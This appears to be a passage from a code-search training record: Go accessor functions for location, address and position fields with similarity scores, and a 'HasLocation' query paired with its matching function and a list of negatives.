{\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TagModelStore) GetLatitudeOk() (*float64, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Latitude.Get(), o.Latitude.IsSet()\n}", "func (r Response) IsLocation() bool {\n\treturn r.isType(TypeLocation)\n}", "func (o *CloudAwsVirtualMachineAllOf) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func CheckIfValidLocation() error {\n\treturn nil\n}", "func (o *BaseReportTransaction) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *InlineObject899) GetLinkLocationOk() (AnyOfobject, bool) {\n\tif o == nil || o.LinkLocation == nil {\n\t\tvar ret AnyOfobject\n\t\treturn ret, false\n\t}\n\treturn *o.LinkLocation, true\n}", "func (m *CarserviceMutation) Location() (r string, exists bool) {\n\tv := m.location\n\tif v == nil {\n\t\treturn\n\t}\n\treturn *v, true\n}", "func (o *SessionDevice) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Workloadv1Location) GetCityOk() (*string, bool) {\n\tif o == nil || o.City == nil {\n\t\treturn nil, false\n\t}\n\treturn o.City, true\n}", "func (o *NewData) GetLocation() Location {\n\tif o == nil || o.Location == nil {\n\t\tvar ret Location\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (o *Workloadv1Location) GetRegionOk() (*string, bool) {\n\tif o == nil || o.Region == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Region, true\n}", "func (o *Workloadv1Location) GetCountryOk() (*string, bool) {\n\tif o == nil || o.Country == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Country, true\n}", "func (o WebTestGeolocationResponseOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v WebTestGeolocationResponse) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (address *Address) GetLocation() *Location {\n\n // Just return a dummy for STUB\n\n return &Location{0,0}\n}", "func (o *Workloadv1Location) GetNameOk() (*string, bool) {\n\tif o == nil || o.Name == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Name, true\n}", "func (o *Member) GetAddrOk() (*string, bool) {\n\tif o == nil || o.Addr == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Addr, true\n}", "func (o *SmscSession) GetLocalAddrOk() (*string, bool) {\n\tif o == nil || o.LocalAddr == nil {\n\t\treturn nil, false\n\t}\n\treturn o.LocalAddr, true\n}", "func (o *ImportPackageLocation) GetPathOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Path, true\n}", "func (ctx *GetLocationsContext) OK(r *Location) error {\n\tctx.ResponseData.Header().Set(\"Content-Type\", \"location\")\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 200, r)\n}", "func (o *VersionedConnection) GetPositionOk() (*Position, bool) {\n\tif o == nil || o.Position == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Position, true\n}", "func (u *User) GetLocation() string {\n\tif u == nil || u.Location == nil {\n\t\treturn \"\"\n\t}\n\treturn *u.Location\n}", "func (o *ComponentReferenceDTO) GetPositionOk() (*PositionDTO, bool) {\n\tif o == nil || o.Position == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Position, true\n}", "func (o *VersionedControllerService) GetPositionOk() (*Position, bool) {\n\tif o == nil || o.Position == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Position, true\n}", "func (l *GitLocation) GetLocation() *tmv1beta1.TestLocation {\n\treturn l.Info\n}", "func (o WebTestGeolocationOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v WebTestGeolocation) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (o *V1VirusDatasetRequest) HasGeoLocation() bool {\n\tif o != nil && o.GeoLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func NewCreateLocationOK() *CreateLocationOK {\n\treturn &CreateLocationOK{}\n}", "func (o *Workloadv1Location) GetCountryCodeOk() (*string, bool) {\n\tif o == nil || o.CountryCode == nil {\n\t\treturn nil, false\n\t}\n\treturn o.CountryCode, true\n}", "func (u *User) GetLocation(tx *pop.Connection) (*Location, error) {\n\tif !u.LocationID.Valid {\n\t\treturn nil, nil\n\t}\n\tlocation := Location{}\n\tif err := tx.Find(&location, u.LocationID); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &location, nil\n}", "func (s *Server) GetLocation(ctx context.Context, req *pb.GetLocationRequest) (*pb.GetLocationResponse, error) {\n\treturn &pb.GetLocationResponse{}, fmt.Errorf(\"Not implemented\")\n}", "func (o *ReportingTaskEntity) GetPositionOk() (*PositionDTO, bool) {\n\tif o == nil || o.Position == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Position, true\n}", "func (lc LocationCriterion) AsLocationCriterion() (*LocationCriterion, bool) {\n\treturn &lc, true\n}", "func (o *V0037Node) GetAddressOk() (*string, bool) {\n\tif o == nil || o.Address == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Address, true\n}", "func (o *PaymentInitiationRecipient) GetAddressOk() (*PaymentInitiationAddress, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Address.Get(), o.Address.IsSet()\n}", "func (l Location) GetLocation() (r Location, err error) {\n\tclient := &http.Client{}\n\treqAdd := fmt.Sprintf(\"https://maps.googleapis.com/maps/api/geocode/json?key=%s&address=%s\", os.Getenv(\"GOOGLE_API_KEY\"), strings.Replace(l.PostCode, \" \", \"%20\", -1))\n\treq, err := http.NewRequest(\"GET\", reqAdd, nil)\n\tif err != nil {\n\t\tfmt.Printf(\"Request: %v\", err)\n\t\treturn r, err\n\t}\n\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\tfmt.Printf(\"Do: %v\", err)\n\t\treturn r, err\n\t}\n\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tfmt.Printf(\"Body: %v\", err)\n\t\treturn r, err\n\t}\n\n\tj := GoogleResponse{}\n\terr = json.Unmarshal(body, &j)\n\tif err != nil {\n\t\tfmt.Printf(\"Unmarshal: %v\", err)\n\t\treturn r, err\n\t}\n\n\tif len(j.Results) >= 1 {\n\t\tr := Location{\n\t\t\tPostCode: l.PostCode,\n\t\t\tLongitude: j.Results[0].Geometry.Location.Longitude,\n\t\t\tLatitude: j.Results[0].Geometry.Location.Latitude,\n\t\t\tStreet: j.Results[0].AddressComponents[1].ShortName,\n\t\t}\n\t\treturn r, nil\n\t}\n\n\treturn r, errors.New(\"invalid postcode\")\n}", "func (l *Location) IsValid() bool {\n\tif len(l.Country) == 0 {\n\t\treturn false\n\t}\n\tif GetCountry(string(l.Country)) == l.Country {\n\t\treturn true\n\t}\n\treturn false\n}", "func (o *SyntheticsTriggerCITestRunResult) GetLocation() int64 {\n\tif o == nil || o.Location == nil {\n\t\tvar ret int64\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (s *SessionData) GetLocation() *time.Location {\n\tif s == nil || s.Location == nil {\n\t\treturn time.UTC\n\t}\n\treturn s.Location\n}", "func (i *InputInlineQueryResultLocation) GetLocation() (value Location) {\n\tif i == nil {\n\t\treturn\n\t}\n\treturn i.Location\n}", "func (gfc GeoFencingCriterion) AsLocationCriterion() (*LocationCriterion, bool) {\n\treturn nil, false\n}", "func (l *Location) GetLocation() string {\n\tchkParsed(l)\n\treturn l.host + \"/\" + l.group + \"/\" + l.name + \":\" + l.version\n}", "func (o *SessionDevice) GetLocation() string {\n\tif o == nil || o.Location == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (lc LanguageCriterion) AsLocationCriterion() (*LocationCriterion, bool) {\n\treturn nil, false\n}", "func (o *LocalDatabaseProvider) GetUpdatedOk() (*time.Time, bool) {\n\tif o == nil || o.Updated == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Updated, true\n}", "func (o *Transaction) GetLocation() Location {\n\tif o == nil {\n\t\tvar ret Location\n\t\treturn ret\n\t}\n\n\treturn o.Location\n}", "func (c Criterion) AsLocationCriterion() (*LocationCriterion, bool) {\n\treturn nil, false\n}", "func (o *PolylineMap) GetPolylineOk() (*string, bool) {\n\tif o == nil || o.Polyline == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Polyline, true\n}", "func (o *TransferOriginatorDiligence) GetAddressOk() (*TransferOriginatorAddress, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Address, true\n}", "func (o *Polygon) GetCoordinatesOk() (*[][][]float64, bool) {\n\tif o == nil || o.Coordinates == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Coordinates, true\n}", "func (o *User) GetCityOk() (string, bool) {\n\tif o == nil || o.City == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.City, true\n}", "func (o *ZoneZone) GetUpdatedOk() (*time.Time, bool) {\n\tif o == nil || o.Updated == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Updated, true\n}", "func (o *SyntheticsPrivateLocationCreationResponse) GetConfigOk() (*interface{}, bool) {\n\tif o == nil || o.Config == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Config, true\n}", "func (o *DKSharesInfo) GetAddressOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Address, true\n}", "func NewGetLocationsOK() *GetLocationsOK {\n\treturn &GetLocationsOK{}\n}", "func (o PartnerRegionInfoResponseOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v PartnerRegionInfoResponse) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (o *VerifiableAddress) GetValueOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Value, true\n}", "func (o *PutCustomersCustomerFidLocationOK) IsSuccess() bool {\n\treturn true\n}", "func (dmc DeviceModelCriterion) AsLocationCriterion() (*LocationCriterion, bool) {\n\treturn nil, false\n}", "func (o *Workloadv1Location) GetCityCodeOk() (*string, bool) {\n\tif o == nil || o.CityCode == nil {\n\t\treturn nil, false\n\t}\n\treturn o.CityCode, true\n}", "func (o *VerifiableAddress) GetStatusOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Status, true\n}", "func (pafc PollAnswerFeedbackCriterion) AsLocationCriterion() (*LocationCriterion, bool) {\n\treturn nil, false\n}", "func (o *DisplayInfo) GetRegionOk() (*string, bool) {\n\tif o == nil || o.Region == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Region, true\n}", "func (v Video) GetLocation() (string, bool) {\n\tif v.Path != \"\" {\n\t\treturn fmt.Sprintf(\"%v/%v\", v.Path, storage.MasterPlaylistName), false\n\t}\n\treturn v.RemotePath, true\n}", "func (m *ServicePrincipalRiskDetection) GetLocation()(SignInLocationable) {\n val, err := m.GetBackingStore().Get(\"location\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(SignInLocationable)\n }\n return nil\n}", "func (o *Organization) GetLocation() string {\n\tif o == nil || o.Location == nil {\n\t\treturn \"\"\n\t}\n\treturn *o.Location\n}", "func (o *AccessRequestData) GetStateOk() (*string, bool) {\n\tif o == nil || o.State == nil {\n\t\treturn nil, false\n\t}\n\treturn o.State, true\n}", "func (o *AdminInfo) GetCountryOk() (*string, bool) {\n\tif o == nil || o.Country == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Country, true\n}", "func (o *MicrosoftGraphEducationSchool) GetAddressOk() (AnyOfmicrosoftGraphPhysicalAddress, bool) {\n\tif o == nil || o.Address == nil {\n\t\tvar ret AnyOfmicrosoftGraphPhysicalAddress\n\t\treturn ret, false\n\t}\n\treturn *o.Address, true\n}", "func (o *IamIpAddress) GetAddressOk() (*string, bool) {\n\tif o == nil || o.Address == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Address, true\n}", "func (o *CloudAwsVirtualMachineAllOf) GetLocation() CloudAwsVpcRelationship {\n\tif o == nil || o.Location == nil {\n\t\tvar ret CloudAwsVpcRelationship\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (o *EntityWatchlistScreeningSearchTerms) GetCountryOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Country.Get(), o.Country.IsSet()\n}", "func (o *ControllerServiceReferencingComponentDTO) GetStateOk() (*string, bool) {\n\tif o == nil || o.State == nil {\n\t\treturn nil, false\n\t}\n\treturn o.State, true\n}", "func (lc LocationController) GetLocation(w http.ResponseWriter, r *http.Request, p httprouter.Params) {\n\t// Grab id\n\tid := p.ByName(\"id\")\n\n\t// Verify id is ObjectId, otherwise bail\n\tif !bson.IsObjectIdHex(id) {\n\t\tw.WriteHeader(404)\n\t\treturn\n\t}\n\n\t// Grab id\n\toid := bson.ObjectIdHex(id)\n\n\t// Stub Location\n\tvar locationObject Location\n\n\t// Fetch user\n\tif err := lc.session.DB(\"go_rest_api_assignment2\").C(\"locations\").FindId(oid).One(&locationObject); err != nil {\n\t\tw.WriteHeader(404)\n\t\treturn\n\t}\n\n\t// Marshal provided interface into JSON structure\n\tuj, _ := json.Marshal(locationObject)\n\n\t// Write content-type, statuscode, payload\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(200)\n\tfmt.Fprintf(w, \"%s\", uj)\n}", "func (resource *GitResource) ValidateLocationInfo() (valid bool, err error) {\n\treturn resource.Handler.Validate()\n}", "func ParseLocation(obj interface{}) (Location, error) {\n\tswitch t := obj.(type) {\n\tcase string:\n\t\tif strings.Contains(t, \"://\") {\n\t\t\tu, err := url.Parse(t)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, fmt.Errorf(\"invalid location: %v\", err)\n\t\t\t}\n\t\t\tloc := Location{\n\t\t\t\t\"scheme\": u.Scheme,\n\t\t\t\t\"type\": u.Scheme,\n\t\t\t\t\"host\": u.Host,\n\t\t\t\t\"path\": u.Path,\n\t\t\t\t\"query\": u.Query().Encode(),\n\t\t\t}\n\t\t\tif u.User != nil {\n\t\t\t\tloc[\"user\"] = u.User.Username()\n\t\t\t\tloc[\"password\"], _ = u.User.Password()\n\t\t\t}\n\t\t\treturn loc, nil\n\t\t}\n\t\t// no scheme, so treat this as a local file\n\t\treturn Location{\n\t\t\t\"type\": \"local\",\n\t\t\t\"path\": t,\n\t\t}, nil\n\tcase map[interface{}]interface{}:\n\t\tloc := Location{}\n\t\tfor k, v := range t {\n\t\t\tloc[fmt.Sprint(k)] = fmt.Sprint(v)\n\t\t}\n\t\treturn loc, nil\n\tcase map[string]interface{}:\n\t\tloc := Location{}\n\t\tfor k, v := range t {\n\t\t\tloc[k] = fmt.Sprint(v)\n\t\t}\n\t\treturn loc, nil\n\tcase map[string]string:\n\t\treturn Location(t), nil\n\t}\n\treturn nil, fmt.Errorf(\"invalid location: %T\", obj)\n}", "func (o *Job) GetTimezoneOk() (*string, bool) {\n\tif o == nil || o.Timezone == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Timezone, true\n}", "func (o *CommitteeInfoResponse) GetStateAddressOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.StateAddress, true\n}" ]
[ "0.8311895", "0.81678605", "0.8039138", "0.79293394", "0.7636388", "0.72251666", "0.70015687", "0.6914366", "0.6898682", "0.6860634", "0.68425786", "0.67777604", "0.6712319", "0.6684269", "0.6681554", "0.66492325", "0.65939796", "0.6583518", "0.6552143", "0.6497801", "0.6398897", "0.6372633", "0.6236864", "0.62039906", "0.6178375", "0.61353457", "0.61128885", "0.60923994", "0.60705477", "0.6018853", "0.6011867", "0.59797764", "0.5947357", "0.5901813", "0.5890038", "0.5866971", "0.5850907", "0.5819048", "0.5809069", "0.57994884", "0.5779808", "0.5779554", "0.5769338", "0.5760383", "0.5735355", "0.57253945", "0.5716624", "0.56981975", "0.56946766", "0.5670933", "0.5639612", "0.56106466", "0.5594334", "0.5570007", "0.5564787", "0.5558204", "0.5529017", "0.55272955", "0.5490667", "0.54757357", "0.5452932", "0.5443117", "0.544287", "0.5441922", "0.54321504", "0.5431413", "0.5428009", "0.5410793", "0.5406735", "0.5396239", "0.5395217", "0.5394081", "0.53928685", "0.53841233", "0.5382298", "0.5380796", "0.53770304", "0.5366513", "0.535073", "0.5332889", "0.53271246", "0.532207", "0.52969223", "0.52934504", "0.52915347", "0.52885216", "0.52881217", "0.52880114", "0.52838194", "0.527397", "0.5269641", "0.5268671", "0.52685714", "0.52679574", "0.526486", "0.5260774", "0.52556056", "0.5254913", "0.525482", "0.5251271" ]
0.7639499
4
HasLocation returns a boolean if a field has been set.
func (o *CloudAwsVirtualMachineAllOf) HasLocation() bool { if o != nil && o.Location != nil { return true } return false }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *NewData) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *BaseReportTransaction) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SessionDevice) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *V1VirusDatasetRequest) HasGeoLocation() bool {\n\tif o != nil && o.GeoLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasOfficeLocation() bool {\n\tif o != nil && o.OfficeLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasUsageLocation() bool {\n\tif o != nil && o.UsageLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SyntheticsTriggerCITestRunResult) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasProfileLocation() bool {\n\tif o != nil && o.ProfileLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *MicrosoftGraphEducationUser) HasUsageLocation() bool {\n\tif o != nil && o.UsageLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Workloadv1Location) HasLatitude() bool {\n\tif o != nil && o.Latitude != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *MicrosoftGraphEducationUser) HasOfficeLocation() bool {\n\tif o != nil && o.OfficeLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m NoMDEntries) HasLocationID() bool {\n\treturn m.Has(tag.LocationID)\n}", "func (t *traceLocation) isSet() bool {\n\treturn t.line > 0\n}", "func (o *StorageSpaceAllOf) HasLbaLocation() bool {\n\tif o != nil && o.LbaLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Workloadv1Location) HasLongitude() bool {\n\tif o != nil && o.Longitude != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TagModelStore) HasLongitude() bool {\n\tif o != nil && o.Longitude.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (d UserData) HasLatitude() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Latitude\", \"latitude\"))\n}", "func (o *Workloadv1Location) HasRegion() bool {\n\tif o != nil && o.Region != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FirmwareHttpServer) HasLocationLink() bool {\n\tif o != nil && o.LocationLink != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (d UserData) HasLongitude() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Longitude\", \"longitude\"))\n}", "func (o *TagModelStore) HasLatitude() bool {\n\tif o != nil && o.Latitude.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SyntheticsPrivateLocationCreationResponse) HasPrivateLocation() bool {\n\tif o != nil && o.PrivateLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Workloadv1Location) HasCountry() bool {\n\tif o != nil && o.Country != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Hdd) HasControllerLocation() bool {\n\tif o != nil && o.ControllerLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Workloadv1Location) HasCity() bool {\n\tif o != nil && o.City != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ReportingTaskEntity) HasPosition() bool {\n\tif o != nil && o.Position != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Member) HasAddr() bool {\n\tif o != nil && o.Addr != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SyntheticsGlobalVariableParseTestOptions) HasField() bool {\n\treturn o != nil && o.Field != nil\n}", "func (r Response) IsLocation() bool {\n\treturn r.isType(TypeLocation)\n}", "func (d UserData) HasStreet() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Street\", \"street\"))\n}", "func (o *InlineObject899) HasLinkLocation() bool {\n\tif o != nil && o.LinkLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DisplayInfo) HasRegion() bool {\n\tif o != nil && o.Region != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SLOCorrectionCreateRequestAttributes) HasTimezone() bool {\n\tif o != nil && o.Timezone != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Job) HasTimezone() bool {\n\tif o != nil && o.Timezone != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (l *Location) IsValid() bool {\n\tif len(l.Country) == 0 {\n\t\treturn false\n\t}\n\tif GetCountry(string(l.Country)) == l.Country {\n\t\treturn true\n\t}\n\treturn false\n}", "func (o *UcsdBackupInfoAllOf) HasBackupLocation() bool {\n\tif o != nil && o.BackupLocation != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *Structx) HasField(name string) bool {\n\t_, ok := s.value.Type().FieldByName(name)\n\treturn ok\n}", "func (o *ComponentReferenceDTO) HasPosition() bool {\n\tif o != nil && o.Position != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func CheckIfValidLocation() error {\n\treturn nil\n}", "func HasWatchdogViaLocation(iLocation string) bool {\n\tif has, err := Engine.Where(\"location = ?\", iLocation).Get(new(Watchdog)); err != nil {\n\t\treturn false\n\t} else {\n\t\tif has {\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n}", "func (o *AdminInfo) HasCountry() bool {\n\tif o != nil && o.Country != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (l *Location) Exists() (bool, error) {\n\n\tclient, err := l.fileSystem.Client(l.Authority)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\t// start timer once action is completed\n\tdefer l.fileSystem.connTimerStart()\n\n\tinfo, err := client.Stat(l.Path())\n\tif err != nil && err == os.ErrNotExist {\n\t\treturn false, nil\n\t} else if err != nil {\n\t\treturn false, err\n\t}\n\n\tif !info.IsDir() {\n\t\treturn false, err\n\t}\n\n\treturn true, nil\n}", "func (o *StatusDescriptorDTO) HasField() bool {\n\tif o != nil && o.Field != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Workloadv1Location) HasRegionCode() bool {\n\tif o != nil && o.RegionCode != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (l Location) IsStation() bool {\n\treturn l.Station != nil\n}", "func (o *Polygon) HasCoordinates() bool {\n\tif o != nil && o.Coordinates != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m *Measurement) HasField(name string) bool {\n\tm.mu.RLock()\n\tdefer m.mu.RUnlock()\n\t_, hasField := m.fieldNames[name]\n\treturn hasField\n}", "func (f Unstructured) HasPath(fieldPath ...string) bool {\n\tif f.IsUndefined() || len(fieldPath) == 0 {\n\t\treturn true\n\t}\n\tif !f.HasByName(fieldPath[0]) {\n\t\treturn false\n\t}\n\treturn f.Field(fieldPath[0]) != nil\n}", "func (o *VersionedControllerService) HasPosition() bool {\n\tif o != nil && o.Position != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func IsHasField(st interface{}, fieldName string) bool {\n\treturn HasField(st, fieldName)\n}", "func HasSurvey() predicate.Location {\n\treturn predicate.Location(func(s *sql.Selector) {\n\t\tstep := sqlgraph.NewStep(\n\t\t\tsqlgraph.From(Table, FieldID),\n\t\t\tsqlgraph.To(SurveyTable, FieldID),\n\t\t\tsqlgraph.Edge(sqlgraph.O2M, true, SurveyTable, SurveyColumn),\n\t\t)\n\t\tsqlgraph.HasNeighbors(s, step)\n\t},\n\t)\n}", "func (o *Workloadv1Location) HasCountryCode() bool {\n\tif o != nil && o.CountryCode != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (c *Configuration) Has(field string) bool {\n\tout := getField(c.App, field)\n\tif out == nil {\n\t\tout = getField(c.Base, field)\n\t}\n\n\treturn out != nil\n}", "func (o *DowntimeScheduleRecurrencesCreateRequest) HasTimezone() bool {\n\treturn o != nil && o.Timezone != nil\n}", "func (ua *UserAddress) Exists() bool { //user_address\n\treturn ua._exists\n}", "func (s *Struct) HasField(name string) bool {\n\tfor _, f := range s.Fields {\n\t\tif f.Name == name {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (o *User) HasCity() bool {\n\tif o != nil && o.City != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (field Field) IsDefined() bool {\n\treturn field.Var != nil\n}", "func (o *User) HasStreetAddress() bool {\n\tif o != nil && o.StreetAddress != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func IsLocationValid(row int, col int) bool {\n\tif row >= 0 && row <= 7 && col >= 0 && col <= 7 {\n\t\treturn true\n\t}\n\treturn false\n}", "func (o *RiskRulesListAllOfData) HasField() bool {\n\tif o != nil && !IsNil(o.Field) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasPlanner() bool {\n\tif o != nil && o.Planner != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (p *Person) HasAddress() bool {\n\tif len(p.Addresses) > 0 {\n\t\tfor _, address := range p.Addresses {\n\t\t\tif address.House != \"\" && address.Street != \"\" && address.City != \"\" && address.State != \"\" {\n\t\t\t\treturn true\n\t\t\t}\n\t\t}\n\t}\n\treturn false\n}", "func (o *V0037JobProperties) HasGpus() bool {\n\tif o != nil && o.Gpus != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (p ByName) HasBeenSet() bool {\n\treturn len(p.whereIsParamSet) > 0\n}", "func (o *Workloadv1Location) HasCityCode() bool {\n\tif o != nil && o.CityCode != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *VersionedFlowCoordinates) HasRegistryUrl() bool {\n\tif o != nil && o.RegistryUrl != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (f Unstructured) HasByName(field string) bool {\n\tif f.IsUndefined() {\n\t\treturn true\n\t}\n\t_, ok := f.fields[field]\n\treturn ok\n}", "func (o *Workloadv1Location) HasName() bool {\n\tif o != nil && o.Name != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TfaCreateMessageRequest) HasRegional() bool {\n\tif o != nil && o.Regional != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func IsLocation(reply Reply) (bool, error) {\n\tif reply.Coords != [2]float64{0, 0} {\n\t\tb, _ := ioutil.ReadFile(\"./static/service_area.json\")\n\t\tfeature, _ := geojson.UnmarshalFeature(b)\n\t\tpnt := orb.Point(reply.Coords)\n\t\t// NOTE: change to postgis if accuracy needed\n\t\tif planar.PolygonContains(feature.Geometry.Bound().ToPolygon(), pnt) {\n\t\t\treturn true, nil\n\t\t}\n\t\treturn false, errors.New(\"Outside service area\")\n\t}\n\tlocPostback := strings.Split(reply.Text, \":\")\n\tif len(locPostback) > 1 && locPostback[0] == \"location\" {\n\t\treturn true, nil\n\t}\n\t// check for text if it's match\n\tif IsThisIn(strings.ToLower(reply.Text), TargetPlaces) {\n\t\treturn true, nil\n\t}\n\treturn false, errors.New(\"Not a location\")\n}", "func (ls Set) Has(field string) bool {\n\t_, exists := ls[field]\n\treturn exists\n}", "func (l Location) IsValid() bool {\n\tif l.X < 0 || l.X > Size-1 || l.Y < 0 || l.Y > Size-1 {\n\t\treturn false\n\t}\n\treturn true\n}", "func (m CrossOrderCancelReplaceRequest) HasLocateReqd() bool {\n\treturn m.Has(tag.LocateReqd)\n}", "func (d UserData) HasTZ() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"TZ\", \"tz\"))\n}", "func (o *Workloadv1Location) HasSubdivision() bool {\n\tif o != nil && o.Subdivision != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasPostalCode() bool {\n\tif o != nil && o.PostalCode != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (d UserData) HasCity() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"City\", \"city\"))\n}", "func (o *RequestSepaMoneyTransferParams) HasStorePin() bool {\n\tif o != nil && o.StorePin != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (q *Quadtree) CanFitLocation(l *Location) bool {\n\treturn q.Boundary.Contains(l.Point)\n}", "func (o *Name) HasProperty() bool {\n\tif o != nil && o.Property != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *VersionedConnection) HasPosition() bool {\n\tif o != nil && o.Position != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m *Map) Has(dot Dot) bool {\n\tp := atomic.LoadPointer(m.fields[dot.Y][dot.X])\n\treturn !fieldIsEmpty(p)\n}", "func (o *User) HasShowInAddressList() bool {\n\tif o != nil && o.ShowInAddressList != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (g *Georeference) 